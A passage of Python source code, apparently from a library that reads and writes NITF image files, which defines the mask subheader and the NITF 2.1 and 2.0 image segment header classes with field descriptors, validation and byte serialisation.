'IMDATOFF': '>I', 'BMRLNTH': '>H', 'TMRLNTH': '>H', 'TPXCDLNTH': '>H'}
# descriptors
IMDATOFF = _IntegerDescriptor(
'IMDATOFF', True, 10,
docstring='Blocked image data offset. This is the size of the masked subheader '
'in bytes.') # type: int
BMRLNTH = _IntegerDescriptor(
'BMRLNTH', True, 5,
docstring='Block mask record length') # type: int
TMRLNTH = _IntegerDescriptor(
'TMRLNTH', True, 5,
docstring='Transparent Pixel Mask Record Length') # type: int
TPXCDLNTH = _IntegerDescriptor(
'TPXCDLNTH', True, 5,
docstring='Transparent Output Pixel Code Length in bits.') # type: int
def __init__(self, band_depth=1, blocks=1, **kwargs):
self._band_depth = band_depth
self._blocks = blocks
self._TPXCD = None
self._BMR = None
self._TMR = None
super(MaskSubheader, self).__init__(**kwargs)
@property
def band_depth(self):
"""
int: The number of band elements. Will only be > 1 if band-sequential format.
"""
return self._band_depth
@property
def blocks(self):
"""
int: The number of blocks.
"""
return self._blocks
@property
def TPXCD(self):
"""
bytes: The Transparent output pixel code.
"""
return self._TPXCD
@TPXCD.setter
def TPXCD(self, value):
if self.TPXCDLNTH == 0:
self._TPXCD = None
return
if not isinstance(value, bytes):
raise TypeError('TPXCD must be of type bytes.')
expected_length = self._get_attribute_length('TPXCD')
if len(value) != expected_length:
raise ValueError(
'Provided TPXCD data is required to be of length {}, '
'but got length {}'.format(expected_length, len(value)))
self._TPXCD = value
@property
def BMR(self):
# type: () -> Union[None, numpy.ndarray]
"""
None|numpy.ndarray: The block mask records array. This will be None if
and only if `BMRLNTH=0`
"""
return self._BMR
@BMR.setter
def BMR(self, value):
if value is None:
if self.BMRLNTH != 0:
raise ValueError('BMR array is None, but BMRLNTH={}'.format(self.BMRLNTH))
self._BMR = None
else:
if self.BMRLNTH != 4:
raise ValueError('BMR array is provided, but BMRLNTH={}'.format(self.BMRLNTH))
if not isinstance(value, numpy.ndarray):
value = numpy.array(value, dtype='uint32')
if value.shape != (self.band_depth, self.blocks):
raise ValueError(
'BMR array is of shape {}, and must be of '
'shape {}'.format(value.shape, (self.band_depth, self.blocks)))
if value.dtype.name != 'uint32':
raise ValueError(
'BMR array has dtype {}, and must be of '
'dtype uint32'.format(value.dtype.name))
self._BMR = value
@property
def TMR(self):
# type: () -> Union[None, numpy.ndarray]
"""
None|numpy.ndarray: The transparent mask records array. This will be None if
and only if `TMRLNTH=0`
"""
return self._TMR
@TMR.setter
def TMR(self, value):
if value is None:
if self.TMRLNTH != 0:
raise ValueError('TMR array is None, but TMRLNTH={}'.format(self.TMRLNTH))
self._TMR = None
else:
if self.TMRLNTH != 4:
raise ValueError('TMR array is provided, but TMRLNTH={}'.format(self.TMRLNTH))
if not isinstance(value, numpy.ndarray):
value = numpy.array(value, dtype='uint32')
if value.shape != (self.band_depth, self.blocks):
raise ValueError(
'TMR array is of shape {}, and must be of '
'shape {}'.format(value.shape, (self.band_depth, self.blocks)))
if value.dtype.name != 'uint32':
raise ValueError(
'TMR array has dtype {}, and must be of '
'dtype uint32'.format(value.dtype.name))
self._TMR = value
@staticmethod
def define_tpxcd_length(tpxcdlnth):
"""
Gets the appropriate length for the TPXCD data.
Parameters
----------
tpxcdlnth : int
The TPXCDLNTH value.
Returns
-------
int
"""
missing = (tpxcdlnth % 8)
if missing == 0:
return int(tpxcdlnth/8)
else:
return int((tpxcdlnth + (8 - missing))/8)
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
if attribute == 'BMR':
if fields['BMRLNTH'] == 0:
fields['BMR'] = None
return start
else:
count = fields['band_depth']*fields['blocks']
end = start+4*count
array = numpy.array(struct.unpack('>{}I'.format(count), value[start:end]), dtype='uint32')
fields['BMR'] = numpy.resize(array, (fields['band_depth'], fields['blocks']))
return end
elif attribute == 'TMR':
if fields['TMRLNTH'] == 0:
fields['TMR'] = None
return start
else:
count = fields['band_depth']*fields['blocks']
end = start+4*count
array = numpy.array(struct.unpack('>{}I'.format(count), value[start:end]), dtype='uint32')
fields['TMR'] = numpy.resize(array, (fields['band_depth'], fields['blocks']))
return end
elif attribute == 'TPXCD':
length = cls.define_tpxcd_length(fields['TPXCDLNTH'])
if length == 0:
fields['TPXCD'] = None
return start
else:
end = start + length
fields['TPXCD'] = value[start:end]
return end
else:
return super(MaskSubheader, cls)._parse_attribute(fields, attribute, value, start)
def _get_attribute_length(self, fld):
if fld in ['BMR', 'TMR']:
value = getattr(self, fld)
if value is None:
return 0
else:
return value.size*4
elif fld == 'TPXCD':
return self.define_tpxcd_length(self.TPXCDLNTH)
else:
return super(MaskSubheader, self)._get_attribute_length(fld)
def _get_attribute_bytes(self, fld):
if fld in ['BMR', 'TMR']:
value = getattr(self, fld)
if value is None:
return b''
else:
return struct.pack('>{}I'.format(value.size), *numpy.reshape(value, (-1,)))
elif fld == 'TPXCD':
if self._TPXCD is None:
return b''
return self._TPXCD
else:
return super(MaskSubheader, self)._get_attribute_bytes(fld)
@classmethod
def from_bytes(cls, value, start, band_depth=1, blocks=1):
fields = {
'band_depth': band_depth, 'blocks': blocks}
loc = start
for fld in cls._ordering:
loc = cls._parse_attribute(fields, fld, value, loc)
out = cls(**fields)
input_length = len(value)-start
out_length = out.get_bytes_length()
if input_length != out_length:
logger.error(
'The MaskSubheader object is being serialized from a bytes buffer of length {},\n\t'
'but would serialize to a bytes object of length {}.\n\t'
'This is likely a result of faulty serialization,\n\t '
'and represents an error.'.format(input_length, out_length))
return out
def to_json(self):
out = OrderedDict([('band_depth', self.band_depth), ('blocks', self.blocks)])
for fld in self._ordering:
value = getattr(self, fld)
if value is None:
continue
if fld in ['BMR', 'TMR']:
out[fld] = value.tolist()
else:
out[fld] = value
return out
#########
# NITF 2.1 version
class ImageSegmentHeader(NITFElement):
"""
The image segment header - see standards document MIL-STD-2500C for more
information.
"""
_ordering = (
'IM', 'IID1', 'IDATIM', 'TGTID',
'IID2', 'Security', 'ENCRYP', 'ISORCE',
'NROWS', 'NCOLS', 'PVTYPE', 'IREP',
'ICAT', 'ABPP', 'PJUST', 'ICORDS',
'IGEOLO', 'Comments', 'IC', 'COMRAT', 'Bands',
'ISYNC', 'IMODE', 'NBPR', 'NBPC', 'NPPBH',
'NPPBV', 'NBPP', 'IDLVL', 'IALVL',
'ILOC', 'IMAG', 'UserHeader', 'ExtendedHeader')
_lengths = {
'IM': 2, 'IID1': 10, 'IDATIM': 14, 'TGTID': 17,
'IID2': 80, 'ENCRYP': 1, 'ISORCE': 42,
'NROWS': 8, 'NCOLS': 8, 'PVTYPE': 3, 'IREP': 8,
'ICAT': 8, 'ABPP': 2, 'PJUST': 1, 'ICORDS': 1,
'IGEOLO': 60, 'IC': 2, 'COMRAT': 4, 'ISYNC': 1, 'IMODE': 1,
'NBPR': 4, 'NBPC': 4, 'NPPBH': 4, 'NPPBV': 4,
'NBPP': 2, 'IDLVL': 3, 'IALVL': 3, 'ILOC': 10,
'IMAG': 4, 'UDIDL': 5, 'IXSHDL': 5}
# Descriptors
IM = _StringEnumDescriptor(
'IM', True, 2, {'IM', }, default_value='IM',
docstring='File part type.') # type: str
IID1 = _StringDescriptor(
'IID1', True, 10, default_value='',
docstring='Image Identifier 1. This field shall contain a valid alphanumeric identification code '
'associated with the image. The valid codes are determined by '
'the application.') # type: str
IDATIM = _StringDescriptor(
'IDATIM', True, 14, default_value='',
docstring='Image Date and Time. This field shall contain the time (UTC) of the image '
'acquisition in the format :code:`YYYYMMDDhhmmss`.') # type: str
TGTID = _StringDescriptor(
'TGTID', True, 17, default_value='',
docstring='Target Identifier. This field shall contain the identification of the primary target '
'in the format, :code:`BBBBBBBBBBOOOOOCC`, consisting of ten characters of Basic Encyclopedia '
'`(BE)` identifier, followed by five characters of facility OSUFFIX, followed by the two '
'character country code as specified in FIPS PUB 10-4.') # type: str
IID2 = _StringDescriptor(
'IID2', True, 80, default_value='',
docstring='Image Identifier 2. This field can contain the identification of additional '
'information about the image.') # type: str
Security = _NITFElementDescriptor(
'Security', True, NITFSecurityTags, default_args={},
docstring='The image security tags.') # type: NITFSecurityTags
ENCRYP = _StringEnumDescriptor(
'ENCRYP', True, 1, {'0'}, default_value='0',
docstring='Encryption.') # type: str
ISORCE = _StringDescriptor(
'ISORCE', True, 42, default_value='',
docstring='Image Source. This field shall contain a description of the source of the image. '
'If the source of the data is classified, then the description shall be preceded by '
'the classification, including codeword(s).') # type: str
NROWS = _IntegerDescriptor(
'NROWS', True, 8, default_value=0,
docstring='Number of Significant Rows in Image. This field shall contain the total number of rows '
'of significant pixels in the image. When the product of the values of the `NPPBV` field '
'and the `NBPC` field is greater than the value of the `NROWS` field '
r'(:math:`NPPBV \cdot NBPC > NROWS`), the rows indexed with the value of the `NROWS` field '
r'to (:math:`NPPBV\cdot NBPC - 1`) shall contain fill data. NOTE: Only the rows indexed '
'0 to the value of the `NROWS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
NCOLS = _IntegerDescriptor(
'NCOLS', True, 8, default_value=0,
docstring='Number of Significant Columns in Image. This field shall contain the total number of '
'columns of significant pixels in the image. When the product of the values of the `NPPBH` '
'field and the `NBPR` field is greater than the `NCOLS` field '
r'(:math:`NPPBH\cdot NBPR > NCOLS`), the columns indexed with the value of the `NCOLS` field '
r'to (:math:`NPPBH\cdot NBPR - 1`) shall contain fill data. NOTE: Only the columns '
'indexed 0 to the value of the `NCOLS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
PVTYPE = _StringEnumDescriptor(
'PVTYPE', True, 3, {'INT', 'B', 'SI', 'R', 'C'},
docstring='Pixel Value Type. This field shall contain an indicator of the type of computer representation '
'used for the value for each pixel for each band in the image. ') # type: str
IREP = _StringEnumDescriptor(
'IREP', True, 8,
{'MONO', 'RGB', 'RGB/LUT', 'MULTI', 'NODISPLY', 'NVECTOR', 'POLAR', 'VPH', 'YCbCr601'},
default_value='NODISPLY',
docstring='Image Representation. This field shall contain a valid indicator of the processing required '
'in order to display an image.') # type: str
ICAT = _StringDescriptor(
'ICAT', True, 8, default_value='SAR',
docstring='Image Category. This field shall contain a valid indicator of the specific category of image, '
'raster or grid data. The specific category of an IS reveals its intended use or the nature '
'of its collector.') # type: str
ABPP = _IntegerDescriptor(
'ABPP', True, 2,
docstring='Actual Bits-Per-Pixel Per Band. This field shall contain the number of "significant bits" for '
'the value in each band of each pixel without compression. Even when the image is compressed, '
'`ABPP` contains the number of significant bits per pixel that were present in the image '
'before compression. This field shall be less than or equal to Number of Bits Per Pixel '
'(field `NBPP`). The number of adjacent bits within each `NBPP` is '
'used to represent the value.') # type: int
PJUST = _StringEnumDescriptor(
'PJUST', True, 1, {'L', 'R'}, default_value='R',
docstring='Pixel Justification. When `ABPP` is not equal to `NBPP`, this field indicates whether the '
'significant bits are left justified (:code:`L`) or right '
'justified (:code:`R`).') # type: str
ICORDS = _StringEnumDescriptor(
'ICORDS', True, 1, {'', 'U', 'G', 'N', 'S', 'D'}, default_value='G',
docstring='Image Coordinate Representation. This field shall contain a valid code indicating the type '
'of coordinate representation used for providing an approximate location of the image in the '
'Image Geographic Location field (`IGEOLO`).') # type: str
Comments = _NITFElementDescriptor(
'Comments', True, ImageComments, default_args={},
docstring='The image comments.') # type: ImageComments
Bands = _NITFElementDescriptor(
'Bands', True, ImageBands, default_args={},
docstring='The image bands.') # type: ImageBands
ISYNC = _IntegerDescriptor(
'ISYNC', True, 1, default_value=0,
docstring='Image Sync code. This field is reserved for future use. ') # type: int
IMODE = _StringEnumDescriptor(
'IMODE', True, 1, {'B', 'P', 'R', 'S'}, default_value='P',
docstring='Image Mode. This field shall indicate how the Image Pixels are '
'stored in the NITF file.') # type: str
NBPR = _IntegerDescriptor(
'NBPR', True, 4, default_value=1,
docstring='Number of Blocks Per Row. This field shall contain the number of image blocks in a row of '
'blocks (paragraph 5.4.2.2) in the horizontal direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NBPC = _IntegerDescriptor(
'NBPC', True, 4, default_value=1,
docstring='Number of Blocks Per Column. This field shall contain the number of image blocks in a column '
'of blocks (paragraph 5.4.2.2) in the vertical direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NPPBH = _IntegerDescriptor(
'NPPBH', True, 4, default_value=0,
docstring='Number of Pixels Per Block Horizontal. This field shall contain the number of pixels horizontally '
'in each block of the image. It shall be the case that the product of the values of the `NBPR` '
'field and the `NPPBH` field is greater than or equal to the value of the `NCOLS` field '
r'(:math:`NBPR\cdot NPPBH \geq NCOLS`). When NBPR is :code:`1`, setting the `NPPBH` '
'value to :code:`0` designates that the number of pixels horizontally is specified by the '
'value in NCOLS.') # type: int
NPPBV = _IntegerDescriptor(
'NPPBV', True, 4, default_value=0,
docstring='Number of Pixels Per Block Vertical. This field shall contain the number of pixels vertically '
'in each block of the image. It shall be the case that the product of the values of the `NBPC` '
'field and the `NPPBV` field is greater than or equal to the value of the `NROWS` field '
r'(:math:`NBPC\cdot NPPBV \geq NROWS`). When `NBPC` is :code:`1`, setting the `NPPBV` value '
r'to :code:`0` designates that the number of pixels vertically is specified by '
r'the value in `NROWS`.') # type: int
NBPP = _IntegerDescriptor(
'NBPP', True, 2, default_value=0,
docstring='Number of Bits Per Pixel Per Band.') # type: int
IDLVL = _IntegerDescriptor(
'IDLVL', True, 3, default_value=0,
docstring='Image Display Level. This field shall contain a valid value that indicates the display level of '
'the image relative to other displayed file components in a composite display. The valid values '
'are :code:`1-999`. The display level of each displayable segment (image or graphic) within a file '
'shall be unique.') # type: int
IALVL = _IntegerDescriptor(
'IALVL', True, 3, default_value=0,
docstring='Attachment Level. This field shall contain a valid value that indicates the attachment '
'level of the image.') # type: int
ILOC = _StringDescriptor(
'ILOC', True, 10, default_value='',
docstring='Image Location. The image location is the location of the first pixel of the first line of the '
'image. This field shall contain the image location offset from the `ILOC` or `SLOC` value '
'of the segment to which the image is attached or from the origin of the CCS when the image '
'is unattached (`IALVL` contains :code:`0`). A row or column value of :code:`0` indicates no offset. '
'Positive row and column values indicate offsets down and to the right while negative row and '
'column values indicate offsets up and to the left.') # type: str
IMAG = _StringDescriptor(
'IMAG', True, 4, default_value='1.0',
docstring='Image Magnification. This field shall contain the magnification (or reduction) factor of the '
'image relative to the original source image. Decimal values are used to indicate magnification, '
'and decimal fraction values indicate reduction. For example, :code:`2.30` indicates the original '
'image has been magnified by a factor of :code:`2.30`, while :code:`0.5` indicates '
'the original image has been reduced by a factor of 2.') # type: str
UserHeader = _NITFElementDescriptor(
'UserHeader', True, UserHeaderType, default_args={},
docstring='User defined header.') # type: UserHeaderType
ExtendedHeader = _NITFElementDescriptor(
'ExtendedHeader', True, UserHeaderType, default_args={},
docstring='Extended subheader - TRE list.') # type: UserHeaderType
def __init__(self, **kwargs):
self._IC = None
self._COMRAT = None
self._IGEOLO = None
self._mask_subheader = None
super(ImageSegmentHeader, self).__init__(**kwargs)
@property
def is_masked(self):
"""
bool: Does this image segment contain a mask?
"""
return self.IC in ['NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8']
@property
def is_compressed(self):
"""
bool: Is this image segment compressed?
"""
return self.IC not in ['NC', 'NM']
@property
def IC(self):
"""
str: Image Compression. This field shall contain a valid code indicating
the form of compression used in representing the image data.
Valid values for this field are, :code:`C1` to represent bi-level, :code:`C3`
to represent JPEG, :code:`C4` to represent Vector Quantization, :code:`C5`
to represent lossless JPEG, :code:`I1` to represent down sampled JPEG,
and :code:`NC` to represent the image is not compressed. Also valid are
:code:`M1, M3, M4`, and :code:`M5` for compressed images, and :code:`NM`
for uncompressed images indicating an image that contains a block
mask and/or a pad pixel mask. :code:`C6` and :code:`M6` are reserved values
that will represent a future correlated multicomponent compression
algorithm. :code:`C7` and :code:`M7` are reserved values that will represent
a future complex SAR compression. :code:`C8` and :code:`M8` are the values
for ISO standard compression JPEG 2000.
The format of a mask image is identical to the format of its corresponding non-masked image
except for the presence of an Image Data Mask at the beginning of
the image data area. The format of the Image Data Mask is described
in paragraph 5.4.3.2 and is shown in table A-3(A). The definitions
of the compression schemes associated with codes :code:`C1/M1, C3/M3, C4/M4, C5/M5`
are given, respectively, in ITU- T T.4, AMD2, MIL-STD-188-198A,
MIL-STD- 188-199, and NGA N0106-97. :code:`C1` is found in ITU- T T.4 AMD2,
:code:`C3` is found in MIL-STD-188-198A, :code:`C4` is found in MIL-STD-188-199,
and :code:`C5` and :code:`I1` are found in NGA N0106-97. (NOTE: :code:`C2` (ARIDPCM) is not
valid in NITF 2.1.) The definition of the compression scheme associated
with codes :code:`C8/M8` is found in ISO/IEC 15444- 1:2000 (with amendments 1 and 2).
"""
return self._IC
@IC.setter
def IC(self, value):
value = _parse_str(value, 2, 'NC', 'IC', self)
if value not in {
'NC', 'NM', 'C0', 'C1', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'I1',
'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8'}:
raise ValueError('IC got invalid value {}'.format(value))
self._IC = value
if value in ('NC', 'NM'):
self._COMRAT = None
elif self._COMRAT is not None:
self._COMRAT = '\x20'*4
@property
def COMRAT(self):
"""
None|str: Compression Rate Code. If the IC field contains one of
:code:`C1, C3, C4, C5, C8, M1, M3, M4, M5, M8, I1`, this field shall be contain
a code indicating the compression rate for the image.
If `IC` is :code:`NC` or :code:`NM`, then this will be set to :code:`None`.
"""
return self._COMRAT
@COMRAT.setter
def COMRAT(self, value):
value = _parse_str(value, 4, None, 'COMRAT', self)
if value is None and self.IC not in ('NC', 'NM'):
value = '\x20'*4
logger.error(
'COMRAT value is None, but IC is not in {"NC", "NM"}.\n\t'
'This must be resolved.')
if value is not None and self.IC in ('NC', 'NM'):
value = None
logger.error(
'COMRAT value is something other than None, but IC in {"NC", "NM"}.\n\t'
'This is invalid, and COMRAT is being set to None.')
self._COMRAT = value
@property
def IGEOLO(self):
"""
None|str: Image Geographic Location. This field, when present, shall contain
an approximate geographic location which is not intended for analytical purposes
(e.g., targeting, mensuration, distance calculation); it is intended to support
general user appreciation for the image location (e.g., cataloguing). The
representation of the image corner locations is specified in the `ICORDS` field.
The locations of the four corners of the (significant) image data shall be given
in image coordinate order: (0,0), (0, MaxCol), (MaxRow, MaxCol), (MaxRow, 0).
MaxCol and MaxRow shall be determined from the values contained, respectively,
in the `NCOLS` field and the `NROWS` field.
"""
return self._IGEOLO
@IGEOLO.setter
def IGEOLO(self, value):
value = _parse_str(value, 60, None, 'IGEOLO', self)
if value is None and self.ICORDS.strip() != '':
value = '\x20'*60
if value is not None and self.ICORDS.strip() == '':
value = None
self._IGEOLO = value
@property
def mask_subheader(self):
# type: () -> Union[None, MaskSubheader]
"""
None|MaskSubheader: The mask subheader, if it has been appended.
"""
return self._mask_subheader
@mask_subheader.setter
def mask_subheader(self, value):
if value is None:
self._mask_subheader = None
return
if not isinstance(value, MaskSubheader):
raise ValueError(
'mask_subheader is expected to be an instance of MaskSubheader. '
'Got type {}'.format(type(value)))
if self.IC not in ['NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8']:
raise ValueError(
'IC={}, which does not indicate the presence of a mask '
'subheader'.format(self.IC))
self._mask_subheader = value
def _get_attribute_length(self, fld):
if fld in ['COMRAT', 'IGEOLO']:
if getattr(self, '_'+fld) is None:
return 0
else:
return self._lengths[fld]
else:
return super(ImageSegmentHeader, self)._get_attribute_length(fld)
@classmethod
def minimum_length(cls):
# COMRAT and IGEOLO may not be there
return super(ImageSegmentHeader, cls).minimum_length() - 64
@classmethod
def _parse_attribute(cls, fields, attribute, value, start):
if attribute == 'IC':
val = value[start:start+2].decode('utf-8')
fields['IC'] = val
if val in ('NC', 'NM'):
fields['COMRAT'] = None
return start+2
elif attribute == 'ICORDS':
fields['ICORDS'] = value[start:start+1]
if fields['ICORDS'] == b' ':
fields['IGEOLO'] = None
return start+1
else:
return super(ImageSegmentHeader, cls)._parse_attribute(fields, attribute, value, start)
#########
# NITF 2.0 version
class ImageSegmentHeader0(NITFElement):
"""
The image segment header for NITF version 2.0 - see standards document
MIL-STD-2500A for more information.
"""
_ordering = (
'IM', 'IID', 'IDATIM', 'TGTID',
'ITITLE', 'Security', 'ENCRYP', 'ISORCE',
'NROWS', 'NCOLS', 'PVTYPE', 'IREP',
'ICAT', 'ABPP', 'PJUST', 'ICORDS',
'IGEOLO', 'Comments', 'IC', 'COMRAT', 'Bands',
'ISYNC', 'IMODE', 'NBPR', 'NBPC', 'NPPBH',
'NPPBV', 'NBPP', 'IDLVL', 'IALVL',
'ILOC', 'IMAG', 'UserHeader', 'ExtendedHeader')
_lengths = {
'IM': 2, 'IID': 10, 'IDATIM': 14, 'TGTID': 17,
'ITITLE': 80, 'ENCRYP': 1, 'ISORCE': 42,
'NROWS': 8, 'NCOLS': 8, 'PVTYPE': 3, 'IREP': 8,
'ICAT': 8, 'ABPP': 2, 'PJUST': 1, 'ICORDS': 1,
'IGEOLO': 60, 'IC': 2, 'COMRAT': 4, 'ISYNC': 1, 'IMODE': 1,
'NBPR': 4, 'NBPC': 4, 'NPPBH': 4, 'NPPBV': 4,
'NBPP': 2, 'IDLVL': 3, 'IALVL': 3, 'ILOC': 10,
'IMAG': 4, 'UDIDL': 5, 'IXSHDL': 5}
# Descriptors
IM = _StringEnumDescriptor(
'IM', True, 2, {'IM', }, default_value='IM',
docstring='File part type.') # type: str
IID = _StringDescriptor(
'IID', True, 10, default_value='',
docstring='Image Identifier 1. This field shall contain a valid alphanumeric identification code '
'associated with the image. The valid codes are determined by '
'the application.') # type: str
IDATIM = _StringDescriptor(
'IDATIM', True, 14, default_value='',
docstring='Image Date and Time. This field shall contain the time (UTC) of the image '
'acquisition in the format :code:`YYYYMMDDhhmmss`.') # type: str
TGTID = _StringDescriptor(
'TGTID', True, 17, default_value='',
docstring='Target Identifier. This field shall contain the identification of the primary target '
'in the format, :code:`BBBBBBBBBBOOOOOCC`, consisting of ten characters of Basic Encyclopedia '
'`(BE)` identifier, followed by five characters of facility OSUFFIX, followed by the two '
'character country code as specified in FIPS PUB 10-4.') # type: str
ITITLE = _StringDescriptor(
'ITITLE', True, 80, default_value='',
docstring='Image Identifier 2. This field can contain the identification of additional '
'information about the image.') # type: str
Security = _NITFElementDescriptor(
'Security', True, NITFSecurityTags0, default_args={},
docstring='The image security tags.') # type: NITFSecurityTags0
ENCRYP = _StringEnumDescriptor(
'ENCRYP', True, 1, {'0'}, default_value='0',
docstring='Encryption.') # type: str
ISORCE = _StringDescriptor(
'ISORCE', True, 42, default_value='',
docstring='Image Source. This field shall contain a description of the source of the image. '
'If the source of the data is classified, then the description shall be preceded by '
'the classification, including codeword(s).') # type: str
NROWS = _IntegerDescriptor(
'NROWS', True, 8, default_value=0,
docstring='Number of Significant Rows in Image. This field shall contain the total number of rows '
'of significant pixels in the image. When the product of the values of the `NPPBV` field '
'and the `NBPC` field is greater than the value of the `NROWS` field '
r'(:math:`NPPBV \cdot NBPC > NROWS`), the rows indexed with the value of the `NROWS` field '
r'to (:math:`NPPBV\cdot NBPC - 1`) shall contain fill data. NOTE: Only the rows indexed '
'0 to the value of the `NROWS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
NCOLS = _IntegerDescriptor(
'NCOLS', True, 8, default_value=0,
docstring='Number of Significant Columns in Image. This field shall contain the total number of '
'columns of significant pixels in the image. When the product of the values of the `NPPBH` '
'field and the `NBPR` field is greater than the `NCOLS` field '
r'(:math:`NPPBH\cdot NBPR > NCOLS`), the columns indexed with the value of the `NCOLS` field '
r'to (:math:`NPPBH\cdot NBPR - 1`) shall contain fill data. NOTE: Only the columns '
'indexed 0 to the value of the `NCOLS` field minus 1 of the image contain significant data. '
'The pixel fill values are determined by the application.') # type: int
PVTYPE = _StringEnumDescriptor(
'PVTYPE', True, 3, {'INT', 'B', 'SI', 'R', 'C'},
docstring='Pixel Value Type. This field shall contain an indicator of the type of computer representation '
'used for the value for each pixel for each band in the image. ') # type: str
IREP = _StringEnumDescriptor(
'IREP', True, 8,
{'MONO', 'RGB', 'RGB/LUT', 'MULTI', 'NODISPLY', 'NVECTOR', 'POLAR', 'VPH', 'YCbCr601'},
default_value='NODISPLY',
docstring='Image Representation. This field shall contain a valid indicator of the processing required '
'in order to display an image.') # type: str
ICAT = _StringDescriptor(
'ICAT', True, 8, default_value='SAR',
docstring='Image Category. This field shall contain a valid indicator of the specific category of image, '
'raster or grid data. The specific category of an IS reveals its intended use or the nature '
'of its collector.') # type: str
ABPP = _IntegerDescriptor(
'ABPP', True, 2,
docstring='Actual Bits-Per-Pixel Per Band. This field shall contain the number of "significant bits" for '
'the value in each band of each pixel without compression. Even when the image is compressed, '
'`ABPP` contains the number of significant bits per pixel that were present in the image '
'before compression. This field shall be less than or equal to Number of Bits Per Pixel '
'(field `NBPP`). The number of adjacent bits within each `NBPP` is '
'used to represent the value.') # type: int
PJUST = _StringEnumDescriptor(
'PJUST', True, 1, {'L', 'R'}, default_value='R',
docstring='Pixel Justification. When `ABPP` is not equal to `NBPP`, this field indicates whether the '
'significant bits are left justified (:code:`L`) or right '
'justified (:code:`R`).') # type: str
ICORDS = _StringEnumDescriptor(
'ICORDS', True, 1, {'U', 'G', 'C', 'N'}, default_value='G',
docstring='Image Coordinate Representation. This field shall contain a valid code indicating the type '
'of coordinate representation used for providing an approximate location of the image in the '
'Image Geographic Location field (`IGEOLO`).') # type: str
Comments = _NITFElementDescriptor(
'Comments', True, ImageComments, default_args={},
docstring='The image comments.') # type: ImageComments
Bands = _NITFElementDescriptor(
'Bands', True, ImageBands, default_args={},
docstring='The image bands.') # type: ImageBands
ISYNC = _IntegerDescriptor(
'ISYNC', True, 1, default_value=0,
docstring='Image Sync code. This field is reserved for future use. ') # type: int
IMODE = _StringEnumDescriptor(
'IMODE', True, 1, {'B', 'P', 'R', 'S'}, default_value='P',
docstring='Image Mode. This field shall indicate how the Image Pixels are '
'stored in the NITF file.') # type: str
NBPR = _IntegerDescriptor(
'NBPR', True, 4, default_value=1,
docstring='Number of Blocks Per Row. This field shall contain the number of image blocks in a row of '
'blocks (paragraph 5.4.2.2) in the horizontal direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NBPC = _IntegerDescriptor(
'NBPC', True, 4, default_value=1,
docstring='Number of Blocks Per Column. This field shall contain the number of image blocks in a column '
'of blocks (paragraph 5.4.2.2) in the vertical direction. If the image consists of only a '
'single block, this field shall contain the value one.') # type: int
NPPBH = _IntegerDescriptor(
'NPPBH', True, 4, default_value=0,
docstring='Number of Pixels Per Block Horizontal. This field shall contain the number of pixels horizontally '
'in each block of the image. It shall be the case that the product of the values of the `NBPR` '
'field and the `NPPBH` field is greater than or equal to the value of the `NCOLS` field '
r'(:math:`NBPR\cdot NPPBH \geq NCOLS`). When NBPR is :code:`1`, setting the `NPPBH` '
'value to :code:`0` designates that the number of pixels horizontally is specified by the '
'value in NCOLS.') # type: int
NPPBV = _IntegerDescriptor(
'NPPBV', True, 4, default_value=0,
docstring='Number of Pixels Per Block Vertical. This field shall contain the number of pixels vertically '
'in each block of the image. It shall be the case that the product of the values of the `NBPC` '
'field and the `NPPBV` field is greater than or equal to the value of the `NROWS` field '
r'(:math:`NBPC\cdot NPPBV \geq NROWS`). When `NBPC` is :code:`1`, setting the `NPPBV` value '
r'to :code:`0` designates that the number of pixels vertically is specified by '
r'the value in `NROWS`.') # type: int
NBPP = _IntegerDescriptor(
'NBPP', True, 2, default_value=0,
docstring='Number of Bits Per Pixel Per Band.') # type: int
IDLVL = _IntegerDescriptor(
'IDLVL', True, 3, default_value=0,
docstring='Image Display Level. This field shall contain a valid value that indicates the display level of '
'the image relative to other displayed file components in a composite display. The valid values '
'are :code:`1-999`. The display level of each displayable segment (image or graphic) within a file '
'shall be unique.') # type: int
IALVL = _IntegerDescriptor(
'IALVL', True, 3, default_value=0,
docstring='Attachment Level. This field shall contain a valid value that indicates the attachment '
'level of the image.') # type: int
ILOC = _StringDescriptor(
'ILOC', True, 10, default_value='',
docstring='Image Location. The image location is the location of the first pixel of the first line of the '
'image. This field shall contain the image location offset from the `ILOC` or `SLOC` value '
'of the segment to which the image is attached or from the origin of the CCS when the image '
'is unattached (`IALVL` contains :code:`0`). A row or column value of :code:`0` indicates no offset. '
'Positive row and column values indicate offsets down and to the right while negative row and '
'column values indicate offsets up and to the left.') # type: str
IMAG = _StringDescriptor(
'IMAG', True, 4, default_value='1.0',
docstring='Image Magnification. This field shall contain the magnification (or reduction) factor of the '
'image relative to the original source image. Decimal values are used to indicate magnification, '
'and decimal fraction values indicate reduction. For example, :code:`2.30` indicates the original '
'image has been magnified by a factor of :code:`2.30`, while :code:`0.5` indicates '
'the original image has been reduced by a factor of 2.') # type: str
UserHeader = _NITFElementDescriptor(
'UserHeader', True, UserHeaderType, default_args={},
docstring='User defined header.') # type: UserHeaderType
ExtendedHeader = _NITFElementDescriptor(
'ExtendedHeader', True, UserHeaderType, default_args={},
docstring='Extended subheader - TRE list.') # type: UserHeaderType
def __init__(self, **kwargs):
self._IC = None
self._COMRAT = None
self._IGEOLO = None
self._mask_subheader = None
super(ImageSegmentHeader0, self).__init__(**kwargs)
@property
def is_masked(self):
"""
bool: Does this image segment contain a mask?
"""
return self.IC in ['NM', 'M1', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8']
@property
def is_compressed(self):
"""
bool: Is this image segment compressed?
"""
return self.IC not in ['NC', 'NM']
@property
def IC(self):
"""
str: Image Compression. This field shall contain a valid code indicating
the form of compression used in representing the image data.
Valid values for this field are, :code:`C1` to represent bi-level, :code:`C3`
to represent JPEG, :code:`C4` to represent Vector Quantization, :code:`C5`
to represent lossless JPEG, :code:`I1` to represent down sampled JPEG,
